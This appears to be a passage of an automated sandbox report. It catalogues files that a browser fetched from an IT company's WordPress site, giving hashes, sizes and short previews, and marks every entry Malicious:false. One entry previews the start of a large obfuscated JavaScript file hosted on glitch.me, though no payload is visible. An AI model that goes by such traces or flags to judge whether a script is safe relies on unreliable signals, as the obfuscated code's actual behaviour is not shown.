                                                                                                                      SSDEEP:192:0u1WCO7EWPWNDqDjMEhii9SqMk96WhQ2K531AlL:EPiE+M
                                                                                                                      MD5:3DE4483C1DA99FD3A391C5EBABDC3699
                                                                                                                      SHA1:E413B4C9B07831B173F3900D8777DA9BC58E4928
                                                                                                                      SHA-256:03F2590278435D8E660CAE76D3C900B6223B06DAC3F526CC43F66B6213B3B63E
                                                                                                                      SHA-512:4290288B27B07F975DE099D66D8B79B37E126DBF16A54D7AE10BEF539AB14A1E90104BCD53728376959DD0231AE8822BC915C3F8AF39D8AD251735C904C223FE
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.0
                                                                                                                      Preview:.mfp-bg{top:0;left:0;width:100%;height:100%!important;z-index:104200;overflow:hidden;position:fixed!important;background:#0b0b0b;opacity:.8}.mfp-wrap{top:0;left:0;width:100%;height:100%;z-index:104300;position:fixed;outline:0!important;-webkit-backface-visibility:hidden}.mfp-container{text-align:center;position:absolute;width:100%;height:100%;left:0;top:0;padding:0 20px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.mfp-container:before{content:'';display:inline-block;height:100%;vertical-align:middle}.mfp-align-top .mfp-container:before{display:none}.mfp-content{position:relative;display:inline-block;vertical-align:middle;margin:0 auto;text-align:left;z-index:104500}.mfp-ajax-holder .mfp-content,.mfp-inline-holder .mfp-content{width:100%;cursor:auto}.mfp-ajax-cur{cursor:progress}.mfp-zoom-out-cur,.mfp-zoom-out-cur .mfp-image-holder .mfp-close{cursor:-moz-zoom-out;cursor:-webkit-zoom-out;cursor:zoom-out}.mfp-zoom{cursor:pointer;cursor:-webkit-zoom-in;cu
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=16, height=1850, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=3700], baseline, precision 8, 1000x500, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):384811
                                                                                                                      Entropy (8bit):7.866614252831209
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:E87hYleEcS1x4e6wzS9VExB5Q5NWOBuXBB+2dJKUHEGoXhptOMK8gsHgDIy:E87m4e6wzSEmkyuX/ldhoXhpcMK8bHgD
                                                                                                                      MD5:36FD7C005F5FD02D9AAD3A0C6C00AC1C
                                                                                                                      SHA1:6DC4C03C84D6E897BA13C99FB3A8007219B05A29
                                                                                                                      SHA-256:59DBFD694C9597A02075FD96A7359DE22FF86E35FE424C34744B1B5806158C9F
                                                                                                                      SHA-512:3B752DC541C945F9809DAE6F5E79F29BC7379D77D4178F4F2DB5705957313CDB1CF61CA46E1F8E6B35E9ED8C30765AE0D42897D1CC9F21219715880E8E5D6E6D
                                                                                                                      Malicious:false
                                                                                                                      Preview:....>NExif..MM.*...............t...........:...........................................................................(...........1...........2.................%...........z...;.......%................i.........p..-h............'.......'.Adobe Photoshop CS5 Macintosh.2013:09:03 14:33:28.e96d6584-6e72-45b5-9c70-0e03ba039c67.t.e.c.h.n.o.l.o.g.y.,. .c.o.m.p.u.t.e.r.,. .s.c.r.e.e.n.,. .b.u.s.i.n.e.s.s.m.a.n.,. .b.u.s.i.n.e.s.s.,. .i.n.t.e.r.n.e.t.,. .c.o.m.m.u.n.i.c.a.t.i.o.n.,. .c.o.n.c.e.p.t.,. .t.o.u.c.h.,. .m.a.n.,. .d.i.g.i.t.a.l.,. .h.a.n.d.,. .b.a.c.k.g.r.o.u.n.d.,. .m.o.d.e.r.n.,. .f.u.t.u.r.e.,. .p.e.o.p.l.e.,. .f.i.n.g.e.r.,. .s.y.m.b.o.l.,. .c.o.n.n.e.c.t.i.o.n.,. .d.i.s.p.l.a.y.,. .m.e.d.i.a.,. .i.n.f.o.r.m.a.t.i.o.n.,. .m.o.n.i.t.o.r.,. .w.o.r.k.,. .s.c.i.e.n.c.e.,. .e.l.e.c.t.r.o.n.i.c.,. .t.e.c.h.,. .b.u.t.t.o.n.,. .g.r.a.p.h.i.c.,. .m.a.l.e.,. .i.c.o.n.,. .i.n.t.e.r.a.c.t.i.o.n.,. .n.e.t.w.o.r.k.,. .t.o.u.c.h.s.c.r.e.e.n.,. .d.e.s.i.g.n.,. .v.i.r.t.u.a.l.,. .w.o.r.l.d.,.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10696)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11846
                                                                                                                      Entropy (8bit):5.9594611119007945
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2IGIsmhP7LK1+UbNFa2m5+F3qFfxxMFFMF6P76aSXH/qFhilfETShPcx3BfMFX01:lVsmM+mNFa2m5+F3ATo/P76aSXH/OilG
                                                                                                                      MD5:69613072FD47208B3E887E698930F8B0
                                                                                                                      SHA1:C3EE81855978B86939F9944CDFD34EDF95E27F4B
                                                                                                                      SHA-256:4802C6241876F07EC19FF817EE870BA31D92E071E2659881A7CAF5C0119CEB3D
                                                                                                                      SHA-512:6354C9281A5F5406A63279760711E5921DBC5753F4559F52EF19999FB671BC2271FAFED891BD932B106FD7578F2FD1F71C79C0CA15AB2BFF5ABA4E6AD943784E
                                                                                                                      Malicious:false
                                                                                                                      URL:"https://maps.googleapis.com/maps/api/js?client=google-maps-embed&paint_origin=&libraries=geometry,search&v=weekly&loading=async&language=en_US&callback=onApiLoad"
                                                                                                                      Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=991\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=991\
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6709
                                                                                                                      Entropy (8bit):7.346517568966907
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:SU3sPLOt+cuFPoxXvX+Qd3RDKvPL6K7zzA33NrRUayh5i+hQJQ2kR:OO+cuJif+QhRDKH7ru3lRUBh1mJpw
                                                                                                                      MD5:35EB816FCA441A39D715F86E093F743C
                                                                                                                      SHA1:5A2D72D9E04788EA62FF3F9618F6E4CC763A441B
                                                                                                                      SHA-256:6BCEFA42AA2D7D56D4E67D86C18F065DBA38C19A453498794A87A90E408FFB36
                                                                                                                      SHA-512:F4BA2692C3F8BAFE7C271F6590E1F0D9C9ED054F59867C33A28BCCC60F85FB943A621562E76D113A52AF25443990914132473DBFDF7BABBD002BDB7FB7EDB953
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................3............................................................................................................................................J.J......................................................................................P....4. 0@.25!".E.....................1..!.AQaq2...."Rr. 0@.B.#....b3....C.................P.. `..!....................!1Aa.Qq. P...0...@..................P..............................................................................................................................................................................................................................................................................................x9........$.......%.......Ly:..bI.)..#.(.B'.E... ..p..>`.Yt]........#.Z...1vW...J..3.b[.."..@=..p.k.Fw.WY.....?@...#.[.J..*....}!...Z.....tE=....j........n..x....."Y..N8...)bq,J.JhH..[.. ...6...%1./dY.t.d........x+...*.#.n.'"........f......qs
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9285
                                                                                                                      Entropy (8bit):7.634431161290036
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:rPovdPvnrId4RscxbWIion5DWAKBackRi:r2hUcsPHon5ia/Ri
                                                                                                                      MD5:E1A25FC97A86E87C2907D1D30C404C0C
                                                                                                                      SHA1:10B753B70DDC5DEB33D4F0D0D1879F2FB37DF95B
                                                                                                                      SHA-256:B5369B01587A49C672A4B377954FC5FB4A35A5511243A63F858C1BEA4ADA76A2
                                                                                                                      SHA-512:B16913C229C1C5A85C9C01F54278120474DB1C4227DB19E502208D9B53A887BDE4F063FE88B2A96179250DEBEDFEAA7C56CB28BC5268455DFD6D6EABC8721CF0
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................7...O......$C............................................................................................................................................J.J........................................................................................0..5. @..P..!1A#4%........................!.1Qq".Aa...2..4 0..BRr..#3s..@..bC....$........................................!1.A 0Qaq..@....P..................................................................................................................................................................................................................................!s.L..7...........>..{.z{.......".G.mMX*......x.y.l.nG...........1s.@7..6......<.=:f...........;.f....[.."...K..(.Y...Y..Gd.YZ.SG`..4.......J...y.>....mY..cI.=.7.J..{MH...$.n..B.&..'.nM....A.h.r.T...;....T....N...Z..B...$.n..*k....q..(.....r.Y...R...l.@.%Cr...f.....$.n...9s.Ae..4....Qs].....Z..L...y..L..j
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1181731
                                                                                                                      Entropy (8bit):3.299897113473948
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:FJYhu4ziE/LHXNMz0znTKAFl7I0RnuE3+noWdKTLJYhu4ziE/LHXNMz0znTKAFl0:I
                                                                                                                      MD5:CA978C77DF03AAD4547A5B311A467078
                                                                                                                      SHA1:4C93D519AFE3D1AF982A6B370047F015EBAC1732
                                                                                                                      SHA-256:365A8E7404CD6377E0AFBBFEE1375A0B5048F1A5A163137AB29C84712BF9B82C
                                                                                                                      SHA-512:882D84D6A295FC73815B1EB0E2642312A6638EAA9CF2EE7409E413D73654D0002AF9841DF6449FA0D43E4E86DB1F973EA11C0447DD33536C9BCDA6F9593E499F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://branched-versed-session.glitch.me/AD.js
                                                                                                                      Preview:(function(_0x8df42a,_0x53fd74){var _0x4b06bb=_0x8df42a();function _0x592ccd(_0x519adb,_0x1ba417){return _0x3198(_0x519adb- -0x2a8,_0x1ba417);}while(!![]){try{var _0x22ccf8=parseInt(_0x592ccd(-0x134,-0x132))/0x1*(parseInt(_0x592ccd(-0x142,-0x151))/0x2)+parseInt(_0x592ccd(-0x130,-0x126))/0x3+-parseInt(_0x592ccd(-0x12f,-0x12f))/0x4+-parseInt(_0x592ccd(-0x13f,-0x149))/0x5*(-parseInt(_0x592ccd(-0x149,-0x13c))/0x6)+parseInt(_0x592ccd(-0x12d,-0x124))/0x7+parseInt(_0x592ccd(-0x14a,-0x14b))/0x8*(parseInt(_0x592ccd(-0x141,-0x14c))/0x9)+-parseInt(_0x592ccd(-0x140,-0x143))/0xa;if(_0x22ccf8===_0x53fd74)break;else _0x4b06bb['push'](_0x4b06bb['shift']());}catch(_0x1e3d7c){_0x4b06bb['push'](_0x4b06bb['shift']());}}}(_0x30e6,0xc1a9b));function _0x3198(_0x41c9ea,_0x1132bc){var _0x5d70af=_0x30e6();return _0x3198=function(_0x4f6bbb,_0x2cdd25){_0x4f6bbb=_0x4f6bbb-0x15e;var _0x5f0db8=_0x5d70af[_0x4f6bbb];return _0x5f0db8;},_0x3198(_0x41c9ea,_0x1132bc);}function _0x417b73(_0x5bc261,_0x14cbbc){return _0x3198(
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):14955
                                                                                                                      Entropy (8bit):7.840925989375588
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:dm4i63pEPxy3orLv9eBxs64hXMlS9hkTNKqt+ElNf5:ni5pyYrLv9e4cleGpthDf5
                                                                                                                      MD5:C186016FE37DBF7FDB68AA437FDD0579
                                                                                                                      SHA1:F8ADD00440D1FF9A6DA6CF51FB5BEE56FC9CA6C1
                                                                                                                      SHA-256:0DDF54ED1152FB28DC5F9D69D53883E748A869B2152EBCC8E4AE1927AEAC3B54
                                                                                                                      SHA-512:5F01AF77812B3BA3229D63A15C5E6F5AB4DF2350248D9A3BB2333AFDE6964ADD03E6492FFF6DAF6717049B9F8DB657BC547DD0611D0BE78012766FB701A735CD
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/meat-market.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................T...V..*...:i............................................................................................................................................J.J.............................................................................................0!1"2 @.A34.P.#5%.&......................!1..AQq"2.a...0....BRbr#3.@..C.P.S .s$ct......................! qA0..@.a......................!1AQaq...0...... @P...........................................................................................................................................................7..................K..3.................[}4..2......#...CW....s..=...*..*..6.RD......Wd..g..F.......S...".:...9.......E-.!K|....f...E8.bR+r&....B>J.........J.l....d.............x.".<.@...|#%$.rBV.H.>#...p.I.4..Q..R.h#...b H.)[,.9......S..o..+!..`q.Sd.......t..3.J..m$...H..%.....h....I....&...:r....[.)...[%:...JHJ.@.......[.9.D..C`..j.J...d0.%.L.....@.y.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65247)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):69917
                                                                                                                      Entropy (8bit):5.290926894311774
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
                                                                                                                      MD5:99B0A83CF1B0B1E2CB16041520E87641
                                                                                                                      SHA1:BC5836992C0B260496BA520FE1336D499BF06EB7
                                                                                                                      SHA-256:DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
                                                                                                                      SHA-512:33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://code.jquery.com/jquery-3.3.1.slim.min.js
                                                                                                                      Preview:/*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32032)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):54780
                                                                                                                      Entropy (8bit):5.238450697949289
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:OYQjF+MMjhPIkwFrHJc2Pyx9b2O68HOkXxEXy7l1pT9Hpyn220DTPRZmtxNpNxCD:s7DY9bfDjv9Hpyn8CmcrM4ODpZ
                                                                                                                      MD5:72805FB6FA518285D00F3721F2EEED88
                                                                                                                      SHA1:EE393D37ABF534EB94BDBFE72B15E4D07A26EF12
                                                                                                                      SHA-256:E9CDBEBB93C076DE37E208742A252641C50A5A527EFCEE16FD18DFF10F237E36
                                                                                                                      SHA-512:E538659E8FCCBF95BC779CFB784B8E6A1119DE75D9D2E02E3A07FC9BBA7BFBFF4BB64CEDF6C9FDCFAB11F3B9BFF5BA96F6FAA9CB052AEB961E356D0CBB35BD07
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?ver=7.0.1
                                                                                                                      Preview:/*. *.jQuery carouFredSel 6.2.1. *.Demo's and documentation:. *.caroufredsel.dev7studios.com. *. *.Copyright (c) 2013 Fred Heusschen. *.www.frebsite.nl. *. *.Dual licensed under the MIT and GPL licenses.. *.http://en.wikipedia.org/wiki/MIT_License. *.http://en.wikipedia.org/wiki/GNU_General_Public_License. */...(function($){function sc_setScroll(a,b,c){return"transition"==c.transition&&"swing"==b&&(b="ease"),{anims:[],duration:a,orgDuration:a,easing:b,startTime:getTime()}}function sc_startScroll(a,b){for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e&&e[0][b.transition](e[1],a.duration,a.easing,e[2])}}function sc_stopScroll(a,b){is_boolean(b)||(b=!0),is_object(a.pre)&&sc_stopScroll(a.pre,b);for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e[0].stop(!0),b&&(e[0].css(e[1]),is_function(e[2])&&e[2]())}is_object(a.post)&&sc_stopScroll(a.post,b)}function sc_afterScroll(a,b,c){switch(b&&b.remove(),c.fx){case"fade":case"crossfade":case"cover-fade":case"uncover-fade":a.css("opacity"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3
                                                                                                                      Entropy (8bit):1.584962500721156
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:P:P
                                                                                                                      MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                      SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                      SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                      SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                      Malicious:false
                                                                                                                      Preview:{}.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11908
                                                                                                                      Entropy (8bit):7.731646186249466
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:hc6z6KFHaAAoEsgfQu8FH2GuYOLkR/i3sg1CyJNvudg/NNNNNNNNN4rAa8:hpZHKsgfQu8FHzuYOLQ/im+udgl
                                                                                                                      MD5:72D3CF7D57241E90C1652314077A3EFA
                                                                                                                      SHA1:54AA5C1EE7AEA69582108DA2665331CF91083D8D
                                                                                                                      SHA-256:F90ADEF645AE9B3356B60B0933FCFC7BF1A5A70F5E2B086383E6D6AA9A5B853A
                                                                                                                      SHA-512:29DF056D1B0CEE75B75584FF77639265543AA465275958A24AA6176228544DAE35163E6EEBD3BF3F0453554A0C5A63110E257A54CF2627874F58DBDEB9CE98D9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/western-cape.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................!m................................................................................................................................................J.J..........................................................................................0!1. 2.5@.A"B.#%6.......................!1.AQq"..3a...2.4.0..BR.#. ..r..@..s5.b.C.S$....................1. !0@Pa`..AQ....................!1AQa..q.0.... @....P.............................................................................................................................................................................................................................................................. .....5..l..*P....(.*Ig}.`.....1m........N\o..............|~.....i.h....j].....,...8..........e.........Nq..>..yt..,.x..{..~-.m.o........R..J..f...l../Vs+0.RK;Kc......Z.t.F...yv.?p..#4..T...l..].._.........z.g.u..........L[V.N~v.C.Il.../D.iY..+.....%..P....e..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=16, height=1850, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=3700], baseline, precision 8, 1000x500, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):384811
                                                                                                                      Entropy (8bit):7.866614252831209
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:E87hYleEcS1x4e6wzS9VExB5Q5NWOBuXBB+2dJKUHEGoXhptOMK8gsHgDIy:E87m4e6wzSEmkyuX/ldhoXhpcMK8bHgD
                                                                                                                      MD5:36FD7C005F5FD02D9AAD3A0C6C00AC1C
                                                                                                                      SHA1:6DC4C03C84D6E897BA13C99FB3A8007219B05A29
                                                                                                                      SHA-256:59DBFD694C9597A02075FD96A7359DE22FF86E35FE424C34744B1B5806158C9F
                                                                                                                      SHA-512:3B752DC541C945F9809DAE6F5E79F29BC7379D77D4178F4F2DB5705957313CDB1CF61CA46E1F8E6B35E9ED8C30765AE0D42897D1CC9F21219715880E8E5D6E6D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpg
                                                                                                                      Preview:....>NExif..MM.*...............t...........:...........................................................................(...........1...........2.................%...........z...;.......%................i.........p..-h............'.......'.Adobe Photoshop CS5 Macintosh.2013:09:03 14:33:28.e96d6584-6e72-45b5-9c70-0e03ba039c67.t.e.c.h.n.o.l.o.g.y.,. .c.o.m.p.u.t.e.r.,. .s.c.r.e.e.n.,. .b.u.s.i.n.e.s.s.m.a.n.,. .b.u.s.i.n.e.s.s.,. .i.n.t.e.r.n.e.t.,. .c.o.m.m.u.n.i.c.a.t.i.o.n.,. .c.o.n.c.e.p.t.,. .t.o.u.c.h.,. .m.a.n.,. .d.i.g.i.t.a.l.,. .h.a.n.d.,. .b.a.c.k.g.r.o.u.n.d.,. .m.o.d.e.r.n.,. .f.u.t.u.r.e.,. .p.e.o.p.l.e.,. .f.i.n.g.e.r.,. .s.y.m.b.o.l.,. .c.o.n.n.e.c.t.i.o.n.,. .d.i.s.p.l.a.y.,. .m.e.d.i.a.,. .i.n.f.o.r.m.a.t.i.o.n.,. .m.o.n.i.t.o.r.,. .w.o.r.k.,. .s.c.i.e.n.c.e.,. .e.l.e.c.t.r.o.n.i.c.,. .t.e.c.h.,. .b.u.t.t.o.n.,. .g.r.a.p.h.i.c.,. .m.a.l.e.,. .i.c.o.n.,. .i.n.t.e.r.a.c.t.i.o.n.,. .n.e.t.w.o.r.k.,. .t.o.u.c.h.s.c.r.e.e.n.,. .d.e.s.i.g.n.,. .v.i.r.t.u.a.l.,. .w.o.r.l.d.,.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11982
                                                                                                                      Entropy (8bit):7.754960854955635
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:pfWhkJexWNtuSM6nJ3oMulSSfdHg+ktTi+t8a6fSbYC8KJ:hsYASMHfNgxdtrFEbKJ
                                                                                                                      MD5:130217D35A017B9B42940FEDC36A00C5
                                                                                                                      SHA1:2EA424EE8807FFEFA2C8E406F7CFC8C66DE53D58
                                                                                                                      SHA-256:356DDE53424D6542B912E6D53F7FA6E4C36686D5205BBB1CE671D3A616C31641
                                                                                                                      SHA-512:556B30E391753DF80A8BF46C556E989FD393CCC5AC4717CA895F7A3EFD47A7B323FE6C9D59098DC6ED7455505E6FDE916CA6A1850928BF38B314F0DEFF2B2F03
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/cherwell.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................B......!x................................................................................................................................................J.J.....................................................................................1..... 4@!.5.0P.3"#.$%.......................!1AQq"r..a...2.0..BR3@.# P...b.CS4..................!0`...@p.....................1!A.Qaq.... 0.@P......................................................................................................................................................................................................................,.f..H.................;...)................n.h9....................\..4=.7H..$u{U`..>H..1.?^....z..........\ls..S.8..=...k.r.S.V.h,...+Y..].{.........*.........<...^"hc...E.4.Ih...l.og.....s..ry........j7*FK..R[.\.\...7...0..\.ku.O=..].;.....9..U...Y...+....y.[...s=..3.g.g..$}3/O..;...O.$#...~...:./>..u...|.'..u.~z..G.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1389
                                                                                                                      Entropy (8bit):7.770462221513277
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:QK25bniv6dGNtrUKmNXsO0lPXBuDs9iOSxRMsba0yfQ242XWefeDuOteXFYv:QK2Niv6dGNZUFNXsfirNyIBDfteVy
                                                                                                                      MD5:5E475EADC46BBF234A7C5869A1AEEFC8
                                                                                                                      SHA1:7212BA3D9846FE9A5F729668A2B26A02A03FB318
                                                                                                                      SHA-256:97AEC3CDB1FB31BFF229298BC4BAFF4EF1612465621467B41C97B50FAB261529
                                                                                                                      SHA-512:F4574E4179CFBE2B2BC531242D9B9F63009739C7BB237FFB020D24B7730BA7B961CFF03214801165BAD8A8C5689C227E193E37791B357DD9D44776968443A715
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-32x32.png
                                                                                                                      Preview:.PNG........IHDR... ... .....szz....4IDATX..ilTU........3].p..*. .L...D.`.....4jjA....MP...u0m..6.D.'G....P!..jL...C..tJ..Nm...[..-.N..m.I&y..}...Y..\...4..a.t.P......!.N....H.i....e.......;.*...... ......,!.).n...34...$.<.C.A`...X.%..V3....&.m@?%...{.#vt...AS}l2)..~.2...=..`.....J..@.+.t`'....k.s.P..M...(....+..).!`^.T.......R....!.7.&.......3w....(.B...x.vX.0.W..@.......`<.0=........$..........{..W{.Fdt....F{..3....b?....d:'..W]..>.6.J....%j.....,.f.$...\?.?..j^.=.X8)....'..."`..fm...k..^.\.[..0...D{j.>iC..ORo.p..q...k.....7..o.4....m.......8G....c....1..-k$y...k...$.!......W...BJ..8G ........U`l..#...$..1..t^.l....#.......',R.....".i?.8.>0.%.S....b_uM....@.....f."......@...Y.;oUe.$...$.. W.\."D..$r.&.XM..v..[...."..VU...4.h.....[..K=;b......QU.izKT....*..U_.B.8.........1?...U...e5+J.U.fVJ....2&..W.?K.....~....~.,.C...z.'2..qRh.'.7..oU.<.3F!).y,.{q.{.X....K[..}@.....M...#"...Z.f.`m..9r(.[k.......0.._...?..'..(..s."..2.MYdN..L`k.m.-../...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):88145
                                                                                                                      Entropy (8bit):5.291106244832159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                      MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                      SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                      SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                      SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                      Malicious:false
